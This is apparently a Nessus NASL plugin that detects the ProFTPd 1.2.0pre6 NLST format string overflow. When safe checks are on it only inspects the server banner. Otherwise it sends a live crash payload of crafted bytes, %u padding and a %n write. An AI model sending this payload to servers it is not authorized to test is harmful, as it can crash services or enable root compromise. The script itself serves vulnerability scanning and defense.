# # This script was written by Renaud Deraison # # # See the Nessus Scripts License for details # if(description) { script_id(10191); script_version ("$Revision$"); script_cve_id("CAN-1999-0911"); script_bugtraq_id(612); name["english"] = "ProFTPd pre6 buffer overflow"; name["francais"] = "Dépassement de buffer dans ProFTP pre6"; script_name(english:name["english"], francais:name["francais"]); desc["english"] = " It was possible to make the remote FTP server crash by issuing this command : NLST aaaXXXX%u%[...]%u%u%u%%u%653300u%n Where XXXX have ascii values 0xDC, 0x4F, 0x07 and 0x08. This problem is known has the 'proftpd pre6' overflow and may allow the remote user to gain root easily. Solution : if you are using proftpd, then upgrade to proftpd 1.2.0pre7. If you are using something else, then upgrade or contact your vendor. Risk factor : High "; desc["francais"] = " Il s'est avéré possible de faire planter le serveur FTP distant en lancant la commande : NLST aaaXXXX%u%[...]%u%u%u%%u%653300u%n Où XXXX ont les valeurs ascii 0xDC, 0x4F, 0x07 et 0x08. Ce problème est connu sous le nom de 'dépassement de buffer proftpd pre6' et permet à un pirate de passer root sur ce système sans grande difficulté. Solution : si vous utilisez proftpd, alors mettez-le à jour en version 1.2.0pre7. Sinon, informez votre vendeur de cette vulnérabilité et demandez un patch. Facteur de risque : elevé "; script_description(english:desc["english"], francais:desc["francais"]); script_summary(english:"Checks if the remote ftp can be buffer overflown", francais:"Détermine si le serveur ftp distant peut etre soumis à un dépassement de buffer"); script_category(ACT_MIXED_ATTACK); # mixed script_family(english:"FTP", francais:"FTP"); script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison", francais:"Ce script est Copyright (C) 1999 Renaud Deraison"); script_dependencie("find_service.nes", "wu_ftpd_overflow.nasl"); script_require_keys("ftp/login"); script_exclude_keys("ftp/ncftpd", "ftp/msftpd"); script_require_ports("Services/ftp", 21); exit(0); } # # The script code starts here : # include("ftp_func.inc"); port = get_kb_item("Services/ftp"); if(!port)port = 21; if(!get_port_state(port))exit(0); # First, we need anonymous access login = get_kb_item("ftp/login"); password = get_kb_item("ftp/password"); banner = get_ftp_banner(port:port); if(!(login) || (safe_checks())) { if(banner) { if(egrep(pattern:"^220 ProFTPD 1\.2\.0pre[1-6][^0-9]", string:banner)) { report = " The remote ProFTPd server is vulnerable to a format string attack in the NLST command An attacker may use this flaw to execute arbitrary commands on the remote host. *** Nessus did not actually test for this flaw but solely *** relied on the banner information to issue *** this warning Solution : upgrade to ProFTPd 1.2.0pre7 or newer Risk factor : High"; security_hole(port:port, data:report); } } exit(0); } soc = open_sock_tcp(port); if(soc) { if(ftp_log_in(socket:soc, user:login, pass:password)) { # # Solaris's FTPd won't answer to an NLST until a port has been # opened to receive the data. # send(socket:soc, data:string("NLST /\r\n")); r = ftp_recv_line(socket:soc); if(!r)exit(0); buf = raw_string("aaa", 0xdc, 0x4f, 0x07, 0x08); buf = buf + crap(data:"%u", length:72) + "%653300u%n"; c = string("NLST ", buf, "\r\n"); send(socket:soc, data:c); b = ftp_recv_line(socket:soc); if(!b)security_hole(port); close(soc); } }